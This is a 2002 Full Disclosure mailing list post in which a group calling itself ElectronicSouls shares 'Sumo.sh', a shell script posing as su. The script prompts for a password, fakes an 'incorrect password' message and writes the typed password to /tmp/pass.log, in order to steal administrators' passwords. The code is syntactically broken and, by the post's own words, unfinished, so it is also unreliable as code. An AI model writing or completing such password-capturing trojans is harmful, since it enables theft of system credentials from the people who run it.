Full Disclosure mailing list archives

[ElectronicSouls] - Fake su


From: es () hush com
Date: Thu, 28 Nov 2002 23:10:02 -0800


-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

We have devised a way to write a fake su wrapper in a shellscript.  Our
shellscripting division has worked hard on this, but it still has a few
bugs!  Feel free to send us patches.

# cat Sumo.sh
#!/bin/sh
#
# Sumo.sh - Fake su
# (C) BrainStorm
# [ElectronicSouls]
#
# Simple script for really
# *stupid* admins ;>

echo "Password:";read pass
if [ $pass = "" ] > .es

echo "su: incorrect password"
echo $pass > /tmp/pass.log

then
rm .es
su
fi

# not finished yet ....

The Electronic Souls Crew
[ElectronicSouuls] (c) 2002

"Americanization that."
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nEtoMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltKFQAoIEV7iO3AXgy
1nox/NaNs4bvl1wDAJ9QpOZ8pBL0NNesceX42ZeAUz8LDQ==
=blQt
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Current thread: